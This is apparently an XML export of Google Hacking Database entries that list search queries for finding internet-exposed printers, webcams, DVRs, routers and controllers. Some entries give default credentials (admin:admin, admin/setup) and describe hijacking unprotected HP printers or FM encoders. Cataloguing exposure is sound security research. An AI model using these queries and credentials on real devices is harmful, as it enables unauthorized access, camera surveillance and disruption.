<entry>
<id>5178</id>
<link>https://www.exploit-db.com/ghdb/5178</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Powered by ViewVC 1.0.3&quot;</shortDescription>
<textualDescription>Find open file access and databases through ViewVC.
~ CrimsonTorso
</textualDescription>
<query>&quot;Powered by ViewVC 1.0.3&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by ViewVC 1.0.3&quot;</querystring>
<edb></edb>
<date>2019-04-11</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>338</id>
<link>https://www.exploit-db.com/ghdb/338</link>
<category>Various Online Devices</category>
<shortDescription>&quot;powered by webcamXP&quot; &quot;Pro|Broadcast&quot;</shortDescription>
<textualDescription>webcamXP PRO:http://www.webcamxp.com/productsadv.htmlThis is the most advanced version of the software. It has all the features of the other versions (including advanced users management, motion detector, and alerts manager) plus remote administration and external server notification when going offline/online.</textualDescription>
<query>&quot;powered by webcamXP&quot; &quot;Pro|Broadcast&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22powered+by+webcamXP%22+%22Pro%7CBroadcast%22</querystring>
<edb></edb>
<date>2004-07-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1016</id>
<link>https://www.exploit-db.com/ghdb/1016</link>
<category>Various Online Devices</category>
<shortDescription>&quot;RICOH Network Printer D model-Restore Factory&quot;</shortDescription>
<textualDescription>Not a whole lot here.</textualDescription>
<query>&quot;RICOH Network Printer D model-Restore Factory&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22RICOH+Network+Printer+D+model-Restore+Factory%22</querystring>
<edb></edb>
<date>2005-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>7187</id>
<link>https://www.exploit-db.com/ghdb/7187</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Router Name&quot; &quot;Router Model&quot; &quot;LAN MAC&quot; &quot;WAN MAC&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Router Name&quot; &quot;Router Model&quot; &quot;LAN MAC&quot; &quot;WAN MAC&quot;
# Various Online Devices
# Date: 08/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>&quot;Router Name&quot; &quot;Router Model&quot; &quot;LAN MAC&quot; &quot;WAN MAC&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Router Name&quot; &quot;Router Model&quot; &quot;LAN MAC&quot; &quot;WAN MAC&quot;</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1418</id>
<link>https://www.exploit-db.com/ghdb/1418</link>
<category>Various Online Devices</category>
<shortDescription>&quot;SnapGear Management Console&quot; &quot;Welcome to the SnapGear Unit!&quot; -pdf</shortDescription>
<textualDescription>&quot;Welcome to the SnapGear Unit! To begin configuring your SnapGear unit now, use the menu to the left, or the Quick Setup Wizard ..&quot; :)PS: this software looks very much like Cyberguard.</textualDescription>
<query>&quot;SnapGear Management Console&quot; &quot;Welcome to the SnapGear Unit!&quot; -pdf</query>
<querystring>https://www.google.com/search?q=%22SnapGear+Management+Console%22+%22Welcome+to+the+SnapGear+Unit!%22+-pdf&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>683</id>
<link>https://www.exploit-db.com/ghdb/683</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Starting SiteZAP 6.0&quot;</shortDescription>
<textualDescription>siteZap webcams !</textualDescription>
<query>&quot;Starting SiteZAP 6.0&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22Starting+SiteZAP+6.0%22</querystring>
<edb></edb>
<date>2004-11-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1058</id>
<link>https://www.exploit-db.com/ghdb/1058</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Summary View of Sensors&quot; | &quot;sensorProbe8 v *&quot; | &quot;cameraProbe 3.0&quot; -filetype:pdf -filetype:html</shortDescription>
<textualDescription>sensorProbe is a SNMP enabled and Web based Environmental Monitoring Device. The sensors attached to this device can monitor temperature, humidity, water leakage and air flow, etc. It does support other sensors which can monitor voltage drop, security, analog and dry contacts. The sensorProbe monitors your equipment's environmental variations, and alerts you through &quot;Email , SMS or SNMP Alerts in your Network Management system&quot; in advance and prevent any disaster.</textualDescription>
<query>&quot;Summary View of Sensors&quot; | &quot;sensorProbe8 v *&quot; | &quot;</query>
<querystring>https://www.google.com/search?q=%22Summary+View+of+Sensors%22+%7C+%22sensorProbe8+v+*%22+%7C+%22cameraProbe+3.0%22+-filetype:pdf+-filetype:html++-site:ihackstuff.com&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>6717</id>
<link>https://www.exploit-db.com/ghdb/6717</link>
<category>Various Online Devices</category>
<shortDescription>&quot;System&quot; + &quot;Toner&quot; + &quot;Input Tray&quot; + &quot;Output Tray&quot; inurl:cgi</shortDescription>
<textualDescription># Google Dork: &quot;System&quot; + &quot;Toner&quot; + &quot;Input Tray&quot; + &quot;Output Tray&quot; inurl:cgi
# Various online devices (printers).
# Date: 3/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;System&quot; + &quot;Toner&quot; + &quot;Input Tray&quot; + &quot;Output Tray&quot; inurl:cgi</query>
<querystring>https://www.google.com/search?q=&quot;System&quot; + &quot;Toner&quot; + &quot;Input Tray&quot; + &quot;Output Tray&quot; inurl:cgi</querystring>
<edb></edb>
<date>2020-12-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1176</id>
<link>https://www.exploit-db.com/ghdb/1176</link>
<category>Various Online Devices</category>
<shortDescription>&quot;This page is for configuring Samsung Network Printer&quot; | printerDetails.htm</shortDescription>
<textualDescription>several different samsung printers</textualDescription>
<query>&quot;This page is for configuring Samsung Network Printer&quot; | printerDetails.htm</query>
<querystring>https://www.google.com/search?q=%22This+page+is+for+configuring+Samsung+Network+Printer%22+%7C+printerDetails.htm</querystring>
<edb></edb>
<date>2005-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>5171</id>
<link>https://www.exploit-db.com/ghdb/5171</link>
<category>Various Online Devices</category>
<shortDescription>&quot;This service is powered by a copy of ZendTo&quot;</shortDescription>
<textualDescription>Find websites using ZendTo software, which includes File Upload &amp; Login
portals.
~ CrimsonTorso
</textualDescription>
<query>&quot;This service is powered by a copy of ZendTo&quot;</query>
<querystring>https://www.google.com/search?q=&quot;This service is powered by a copy of ZendTo&quot;</querystring>
<edb></edb>
<date>2019-04-05</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>985</id>
<link>https://www.exploit-db.com/ghdb/985</link>
<category>Various Online Devices</category>
<shortDescription>&quot;To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!&quot; -site:webblernet.nl -site:ihackstuff.com -sit</shortDescription>
<textualDescription>speedtouch 510 DSL modem devices that were once unprotected. That may have changed by now.</textualDescription>
<query>&quot;To view the Web interface of the SpeedTouch, Java</query>
<querystring>https://www.google.com/search?q=%22To+view+the+Web+interface+of+the+SpeedTouch,+JavaScript+must+be+supported+and+enabled+on+your+browser!%22+-site:webblernet.nl+-site:ihackstuff.com+-site:blogspot.com&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>4348</id>
<link>https://www.exploit-db.com/ghdb/4348</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Upload&quot; inurl:&quot;https://webfiles&quot;</shortDescription>
<textualDescription>This dork finds pages vulnerable to directory traversal, upload and download of files.
Dork: &quot;Upload&quot; inurl:&quot;https://webfiles&quot;
-Gee</textualDescription>
<query>&quot;Upload&quot; inurl:&quot;https://webfiles&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Upload&quot; inurl:&quot;https://webfiles&quot;</querystring>
<edb></edb>
<date>2016-10-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6920</id>
<link>https://www.exploit-db.com/ghdb/6920</link>
<category>Various Online Devices</category>
<shortDescription>&quot;USB Port 1 (Public Data)&quot; + &quot;USB Port 2 (Public Data)&quot; &quot;Status&quot; -pdf</shortDescription>
<textualDescription># Google Dork: &quot;USB Port 1 (Public Data)&quot; + &quot;USB Port 2 (Public Data)&quot; &quot;Status&quot; -pdf
# Various Online Devices.
# Date: 28/04/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;USB Port 1 (Public Data)&quot; + &quot;USB Port 2 (Public Data)&quot; &quot;Status&quot; -pdf</query>
<querystring>https://www.google.com/search?q=&quot;USB Port 1 (Public Data)&quot; + &quot;USB Port 2 (Public Data)&quot; &quot;Status&quot; -pdf</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4618</id>
<link>https://www.exploit-db.com/ghdb/4618</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Use these fields to set or change the Administrator Password. When set, the Administrator Password is required before you can access and change configuration parameters. To disable the Administrator Password, leave the entries blank.&quot;</shortDescription>
<textualDescription>The following Google search gives output of HP printers whose authentication
is not set. Hence an attacker can simply visit the links from the dork
output to set Administrator Password .
&quot;Use these fields to set or change the Administrator Password. When set, the
Administrator Password is required before you can access and change
configuration parameters. To disable the Administrator Password, leave the
entries blank.&quot;
Once the password is set, the attacker gets admin access to the HP printer.
This can be used to cause disruption.
Ankit Anubhav, NewSky Security
</textualDescription>
<query>&quot;Use these fields to set or change the Administrator Password. When set, the Administrator Password is required before you can access and change configuration parameters. To disable the Administrator Password, leave the entries blank.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Use these fields to set or change the Administrator Password. When set, the Administrator Password is required before you can access and change configuration parameters. To disable the Administrator Password, leave the ent</querystring>
<edb></edb>
<date>2017-11-24</date>
<author>Ankit Anubhav</author>
</entry>
<entry>
<id>6971</id>
<link>https://www.exploit-db.com/ghdb/6971</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Username&quot; &quot;Password&quot; &quot;ZTE Corporation. All rights reserved.&quot;</shortDescription>
<textualDescription># Dork: &quot;Username&quot; &quot;Password&quot; &quot;ZTE Corporation. All rights reserved.&quot;</textualDescription>
<query>&quot;Username&quot; &quot;Password&quot; &quot;ZTE Corporation. All rights reserved.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Username&quot; &quot;Password&quot; &quot;ZTE Corporation. All rights reserved.&quot;</querystring>
<edb></edb>
<date>2021-06-01</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>5783</id>
<link>https://www.exploit-db.com/ghdb/5783</link>
<category>Various Online Devices</category>
<shortDescription>&quot;VB Viewer&quot; inurl:/viewer/live/ja/live.html</shortDescription>
<textualDescription>Dork:
&quot;VB Viewer&quot; inurl:/viewer/live/ja/live.html
Description:
IP Cameras
</textualDescription>
<query>&quot;VB Viewer&quot; inurl:/viewer/live/ja/live.html</query>
<querystring>https://www.google.com/search?q=&quot;VB Viewer&quot; inurl:/viewer/live/ja/live.html</querystring>
<edb></edb>
<date>2020-03-11</date>
<author>Riku Dola</author>
</entry>
<entry>
<id>4196</id>
<link>https://www.exploit-db.com/ghdb/4196</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Web page sent by InterMapper&quot;</shortDescription>
<textualDescription>Dork with funny maps of networks.
Dork by Rootkit Pentester.
Regards.</textualDescription>
<query>&quot;Web page sent by InterMapper&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Web page sent by InterMapper&quot;</querystring>
<edb></edb>
<date>2016-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>909</id>
<link>https://www.exploit-db.com/ghdb/909</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Webthru User Login&quot;</shortDescription>
<textualDescription>samsung webthru cameras</textualDescription>
<query>&quot;Webthru User Login&quot;</query>
<querystring>https://www.google.com/search?q=%22Webthru+User+Login%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>1417</id>
<link>https://www.exploit-db.com/ghdb/1417</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Welcome to the CyberGuard unit!&quot;</shortDescription>
<textualDescription>&quot;Welcome to the CyberGuard unit! To begin configuring your CyberGuard unit now, use the menu to the left, or the Quick Setup Wizard ..&quot; :)</textualDescription>
<query>&quot;Welcome to the CyberGuard unit!&quot;</query>
<querystring>https://www.google.com/search?q=%22Welcome+to+the+CyberGuard+unit!+%22&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3802</id>
<link>https://www.exploit-db.com/ghdb/3802</link>
<category>Various Online Devices</category>
<shortDescription>'apc info' 'apc.php?SCOPE='</shortDescription>
<textualDescription>This dork will locate Unsecured PHP APC Installations.
With regards,
Shubham Mittal
(Hack Planet Technologies)
http://hackplanet.in</textualDescription>
<query>'apc info' 'apc.php?SCOPE='</query>
<querystring>https://www.google.com/search?q='apc info' 'apc.php?SCOPE='</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>990</id>
<link>https://www.exploit-db.com/ghdb/990</link>
<category>Various Online Devices</category>
<shortDescription>( intitle:&quot;PacketShaper Login&quot;)|(intitle:&quot;PacketShaper Customer Login&quot;)</shortDescription>
<textualDescription>Packeteer's PacketShaper is an application traffic management system that monitors, controls, and accelerates application performance over the WAN Internet.</textualDescription>
<query>( intitle:&quot;PacketShaper Login&quot;)|(intitle:&quot;PacketShaper Customer Login&quot;)</query>
<querystring>https://www.google.com/search?q=(+intitle:%22PacketShaper+Login%22)%7C(intitle:%22PacketShaper+Customer+Login%22)&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>514</id>
<link>https://www.exploit-db.com/ghdb/514</link>
<category>Various Online Devices</category>
<shortDescription>(&quot;Fiery WebTools&quot; inurl:index2.html) | &quot;WebTools enable * * observe, *, * * * flow * print jobs&quot;</shortDescription>
<textualDescription>Fiery WebTools offers many of the same capabilities of the Command WorkStationâââ¬Å¾Ã¢, via a Java-enabled Web browser. All job control options such as job merging, edition and previews, as well as information on the status of the jobs are accessible through Fiery WebTools.</textualDescription>
<query>(&quot;Fiery WebTools&quot; inurl:index2.html) | &quot;WebTools enable * * observe, *, * * * flow * print jobs&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%28%22Fiery+WebTools%22+inurl%3Aindex2.html%29+%7C+%22WebTools+enable+*+*+observe%2C+*%2C+*+*+*+flow+*+print+jobs%22</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1175</id>
<link>https://www.exploit-db.com/ghdb/1175</link>
<category>Various Online Devices</category>
<shortDescription>(&quot;port_255/home&quot;)|(inurl:&quot;home?port=255&quot;)</shortDescription>
<textualDescription>standered printer search. Moderator note: see also dork id=1221</textualDescription>
<query>(&quot;port_255/home&quot;)|(inurl:&quot;home?port=255&quot;)</query>
<querystring>https://www.google.com/search?q=(%22port_255/home%22)%7C(inurl:%22home%3Fport%3D255%22)&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>997</id>
<link>https://www.exploit-db.com/ghdb/997</link>
<category>Various Online Devices</category>
<shortDescription>(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp</shortDescription>
<textualDescription>Kpix Java Based Traffic Cameras. Based at CBS broadcasting for San Fransisco, Oakland, and San Jose.</textualDescription>
<query>(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp</query>
<querystring>https://www.google.com/search?q=(cam1java)%7C(cam2java)%7C(cam3java)%7C(cam4java)%7C(cam5java)%7C(cam6java)+-navy.mil+-backflip+-power.ne.jp&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-06-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4882</id>
<link>https://www.exploit-db.com/ghdb/4882</link>
<category>Various Online Devices</category>
<shortDescription>(intitle:&quot;plexpy - home&quot; OR &quot;intitle:tautulli - home&quot;) AND intext:&quot;libraries&quot;</shortDescription>
<textualDescription>Helps to locate unprotected (no user/password needed) Tautulli servers. Tautulli (Formerly PlexPy) is a 3rd party application for monitoring the activity and tracks various statistics of a Plex Media Server. More info: (https://tautulli.com)
Gerard Fuguet (gerard@fuguet.cat)</textualDescription>
<query>(intitle:&quot;plexpy - home&quot; OR &quot;intitle:tautulli - home&quot;) AND intext:&quot;libraries&quot;</query>
<querystring>https://www.google.com/search?q=(intitle:&quot;plexpy - home&quot; OR &quot;intitle:tautulli - home&quot;) AND intext:&quot;libraries&quot;</querystring>
<edb></edb>
<date>2018-07-03</date>
<author>Gerard Fuguet</author>
</entry>
<entry>
<id>1155</id>
<link>https://www.exploit-db.com/ghdb/1155</link>
<category>Various Online Devices</category>
<shortDescription>(intitle:&quot;VisionGS Webcam Software&quot;)|(intext:&quot;Powered by VisionGS Webcam&quot;) -showthread.php -showpost.php -&quot;Search Engine&quot; -computersglobal.com -site:g</shortDescription>
<textualDescription>I don't know if the google query got submitted right because it looks truncated. here it is again:(intitle:&quot;VisionGS Webcam Software&quot;)|(intext:&quot;Powered by VisionGS Webcam&quot;) -showthread.php -showpost.php -&quot;Search Engine&quot; -computersglobal.com -site:golb.org -site:chat.ru -site:findlastminute.de -site:tricus.de -site:urlaubus.de -johnny.ihackstuff VisionGS webcam software enables anyone with a webcam to easily host a webcam http server. This dork finds those servers.</textualDescription>
<query>(intitle:&quot;VisionGS Webcam Software&quot;)|(intext:&quot;Powered by VisionGS Webcam&quot;) -showthread.php -showpost.php -&quot;Search Engine&quot; -computersglobal.com -site:g</query>
<querystring>https://www.google.com/search?q=%28intitle%3A%22VisionGS+Webcam+Software%22%29%7C%28intext%3A%22Powered+by+VisionGS+Webcam%22%29+-showthread.php+-showpost.php+-%22Search+Engine%22+-computersglobal.com+-site%3Agolb.org+-site%3Achat.ru+-site%3Afindlas</querystring>
<edb></edb>
<date>2005-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1374</id>
<link>https://www.exploit-db.com/ghdb/1374</link>
<category>Various Online Devices</category>
<shortDescription>(intitle:(EyeSpyFX|OptiCamFX) &quot;go to camera&quot;)|(inurl:servlet/DetectBrowser)</shortDescription>
<textualDescription>just more cameras vendor site: http://www.eyespyfx.com/</textualDescription>
<query>(intitle:(EyeSpyFX|OptiCamFX) &quot;go to camera&quot;)|(inurl:servlet/DetectBrowser)</query>
<querystring>https://www.google.com/search?q=%28intitle%3A%28EyeSpyFX%7COptiCamFX%29+%22go+to+camera%22%29%7C%28inurl%3Aservlet%2FDetectBrowser%29&amp;num=100</querystring>
<edb></edb>
<date>2006-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>1335</id>
<link>https://www.exploit-db.com/ghdb/1335</link>
<category>Various Online Devices</category>
<shortDescription>(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)</shortDescription>
<textualDescription>more cams...vendor site: http://www.mobotix.com/layout/set/index/language/index</textualDescription>
<query>(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)</query>
<querystring>https://www.google.com/search?q=(intitle:MOBOTIX+intitle:PDAS)+%7C+(intitle:MOBOTIX+intitle:Seiten)+%7C+(inurl:/pda/index.html+%2Bcamera)&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>553</id>
<link>https://www.exploit-db.com/ghdb/553</link>
<category>Various Online Devices</category>
<shortDescription>(inurl:webArch/mainFrame.cgi ) | (intitle:&quot;web image monitor&quot; -htm -solutions)</shortDescription>
<textualDescription>The Ricoh Aficio 2035 (fax/scanner) web interface.Attackers may read faxes and can get information like internal ip addresses.cleanup by: yeseins &amp; golfocleanup date: Apr 28, 2005original dork: inurl:webArch/mainFrame.cgi</textualDescription>
<query>(inurl:webArch/mainFrame.cgi ) | (intitle:&quot;web image monitor&quot; -htm -solutions)</query>
<querystring>https://www.google.com/search?num=20&amp;q=%28inurl%3AwebArch%2FmainFrame.cgi+%29+%7C+%28intitle%3A%22web+image+monitor%22+-htm+-solutions%29</querystring>
<edb></edb>
<date>2004-10-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4479</id>
<link>https://www.exploit-db.com/ghdb/4479</link>
<category>Various Online Devices</category>
<shortDescription>(site:onion.link | site:onion.cab | site:tor2web.org | site:onion.sh | site:tor2web.fi | site:onion.direct)</shortDescription>
<textualDescription>Finds sites hosted on the Tor network accessible with Tor2Web servers
Dxtroyer</textualDescription>
<query>(site:onion.link | site:onion.cab | site:tor2web.org | site:onion.sh | site:tor2web.fi | site:onion.direct)</query>
<querystring>https://www.google.com/search?q=(site:onion.link | site:onion.cab | site:tor2web.org | site:onion.sh | site:tor2web.fi | site:onion.direct)</querystring>
<edb></edb>
<date>2017-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4270</id>
<link>https://www.exploit-db.com/ghdb/4270</link>
<category>Various Online Devices</category>
<shortDescription>/@fmb80_encoder.htm</shortDescription>
<textualDescription>Hi !
I'm a sound technicien in radio fm world
This dork give u acces to digiplexer (u can change text of all the listener of a FM radio in there car for exemple : ) )
peace</textualDescription>
<query>/@fmb80_encoder.htm</query>
<querystring>https://www.google.com/search?q=/@fmb80_encoder.htm</querystring>
<edb></edb>
<date>2016-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>8147</id>
<link>https://www.exploit-db.com/ghdb/8147</link>
<category>Various Online Devices</category>
<shortDescription>=?UTF-8?Q?intext:&quot;Please_respect_other_people=E2=80=99s_priva?= =?UTF-8?Q?cy_and_rights_when_using_product.&quot;_hikvision?=</shortDescription>
<textualDescription># Google Dork: intext:&quot;Please respect other peoples privacy and
rights when using product.&quot; hikvision
# Various Online Devices
# Date:10/04/2023
# Exploit Author: Zayed AlJaberi</textualDescription>
<query>=?UTF-8?Q?intext:&quot;Please_respect_other_people=E2=80=99s_priva?= =?UTF-8?Q?cy_and_rights_when_using_product.&quot;_hikvision?=</query>
<querystring>https://www.google.com/search?q==?UTF-8?Q?intext:&quot;Please_respect_other_people=E2=80=99s_priva?= =?UTF-8?Q?cy_and_rights_when_using_product.&quot;_hikvision?=</querystring>
<edb></edb>
<date>2023-04-10</date>
<author>Zayed AlJaberi</author>
</entry>
<entry>
<id>516</id>
<link>https://www.exploit-db.com/ghdb/516</link>
<category>Various Online Devices</category>
<shortDescription>Aficio 1022</shortDescription>
<textualDescription>The Ricoh Aficio 1022 is a digital multifunctional B&amp;W copier, easily upgraded to include network printing, network scanning, standard/LAN faxing and storage capabilities.</textualDescription>
<query>inurl:sts_index.cgi</query>
<querystring>https://www.google.com/search?q=inurl%3Asts_index.cgi</querystring>
<edb></edb>
<date>2004-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>6928</id>
<link>https://www.exploit-db.com/ghdb/6928</link>
<category>Various Online Devices</category>
<shortDescription>allintext:&quot;Copyright CANON INC&quot; &quot;iR-ADV&quot;</shortDescription>
<textualDescription># Dork: allintext:&quot;Copyright CANON INC&quot; &quot;iR-ADV&quot;
# (Canon Printer) VArious Online Devices
# Exploit Author: Shivani Arya
</textualDescription>
<query>allintext:&quot;Copyright CANON INC&quot; &quot;iR-ADV&quot;</query>
<querystring>https://www.google.com/search?q=allintext:&quot;Copyright CANON INC&quot; &quot;iR-ADV&quot;</querystring>
<edb></edb>
<date>2021-05-13</date>
<author>Shivani Arya</author>
</entry>
<entry>
<id>1393</id>
<link>https://www.exploit-db.com/ghdb/1393</link>
<category>Various Online Devices</category>
<shortDescription>allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 &quot;Network Camera &quot;</shortDescription>
<textualDescription>No one search will reveal all Axis cameras. This is a variant for the 2xxx series.</textualDescription>
<query>allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 &quot;Network Camera &quot;</query>
<querystring>https://www.google.com/search?q=allintitle:+Axis+2.10+OR+2.12+OR+2.30+OR+2.31+OR+2.32+OR+2.33+OR+2.34+OR+2.40+OR+2.42+OR+2.43+%22Network+Camera+%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1388</id>
<link>https://www.exploit-db.com/ghdb/1388</link>
<category>Various Online Devices</category>
<shortDescription>allintitle: EDR1600 login | Welcome</shortDescription>
<textualDescription>Everfocus EDR1600</textualDescription>
<query>allintitle: EDR1600 login | Welcome</query>
<querystring>https://www.google.com/search?q=allintitle:++EDR1600+login+%7C+Welcome&amp;filter=0</querystring>
<edb></edb>
<date>2006-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1389</id>
<link>https://www.exploit-db.com/ghdb/1389</link>
<category>Various Online Devices</category>
<shortDescription>allintitle: EDR400 login | Welcome</shortDescription>
<textualDescription>Everfocus EDR400</textualDescription>
<query>allintitle: EDR400 login | Welcome</query>
<querystring>https://www.google.com/search?q=allintitle:++EDR400+login+%7C+Welcome&amp;filter=0</querystring>
<edb></edb>
<date>2006-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1386</id>
<link>https://www.exploit-db.com/ghdb/1386</link>
<category>Various Online Devices</category>
<shortDescription>allintitle: EverFocus | EDSR | EDSR400 Applet</shortDescription>
<textualDescription>Modified Everfocus search, pulls in EDSR400's as well s a few strays missed by original query.</textualDescription>
<query>allintitle: EverFocus | EDSR | EDSR400 Applet</query>
<querystring>https://www.google.com/search?q=allintitle:+EverFocus+%7C+EDSR+%7C+EDSR400+Applet&amp;num=100&amp;&amp;filter=0</querystring>
<edb></edb>
<date>2006-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>5167</id>
<link>https://www.exploit-db.com/ghdb/5167</link>
<category>Various Online Devices</category>
<shortDescription>allintitle:&quot;3cx phone system management console&quot;</shortDescription>
<textualDescription>Find 3cx Phone System Management Console
allintitle:&quot;3cx phone system management console&quot;
Discovered By: Kevin Randall
</textualDescription>
<query>Find 3cx Phone System Management Console</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;3cx phone system management console&quot;</querystring>
<edb></edb>
<date>2019-04-03</date>
<author>Kevin Randall</author>
</entry>
<entry>
<id>8199</id>
<link>https://www.exploit-db.com/ghdb/8199</link>
<category>Various Online Devices</category>
<shortDescription>allintitle:&quot;A8810-0&quot;</shortDescription>
<textualDescription># Google Dork: allintitle:&quot;A8810-0&quot;
# Various Online Devices
# Date:31/05/2023
# Exploit Author: Thomas Heverin</textualDescription>
<query>allintitle:&quot;A8810-0&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;A8810-0&quot;</querystring>
<edb></edb>
<date>2023-05-31</date>
<author>Thomas Heverin</author>
</entry>
<entry>
<id>1397</id>
<link>https://www.exploit-db.com/ghdb/1397</link>
<category>Various Online Devices</category>
<shortDescription>allintitle:&quot;DVR login&quot;</shortDescription>
<textualDescription>softwell Technology &quot;Wit-Eye&quot; DVR.Default user/pass is admin:adminRequires ActiveX</textualDescription>
<query>allintitle:&quot;DVR login&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:%22DVR+login%22&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1434</id>
<link>https://www.exploit-db.com/ghdb/1434</link>
<category>Various Online Devices</category>
<shortDescription>allintitle:&quot;SyncThru Web Service&quot;</shortDescription>
<textualDescription>This search finds Internet-connected Samsung printer control panels.</textualDescription>
<query>allintitle:&quot;SyncThru Web Service&quot;</query>
<querystring>https://www.google.com/search?q=allintitle%3A%22SyncThru+Web+Service%22&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>3758</id>
<link>https://www.exploit-db.com/ghdb/3758</link>
<category>Various Online Devices</category>
<shortDescription>allintitle:&quot;UniMep Station Controller&quot;</shortDescription>
<textualDescription>UniMep is a device for managing fuel station. You can see process of
fueling cars and you can make some changes in the setting.
The default username/password is admin/setup. Author: WBR rigan</textualDescription>
<query>allintitle:&quot;UniMep Station Controller&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;UniMep Station Controller&quot;</querystring>
<edb></edb>
<date>2011-12-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6498</id>
<link>https://www.exploit-db.com/ghdb/6498</link>
<category>Various Online Devices</category>
<shortDescription>allintitle:&quot;Welcome to the Web-Based Configurator&quot;</shortDescription>
<textualDescription>Google Dork: allintitle:&quot;Welcome to the Web-Based Configurator&quot;
Description: This Google Dork is useful in detecting login pages/portals of
ZyXEL based networking devices, mainly router configuration interfaces.
Author: Sibi Mathew George
</textualDescription>
<query>allintitle:&quot;Welcome to the Web-Based Configurator&quot;</query>
<querystring>https://www.google.com/search?q=allintitle:&quot;Welcome to the Web-Based Configurator&quot;</querystring>
<edb></edb>
<date>2020-08-27</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>877</id>
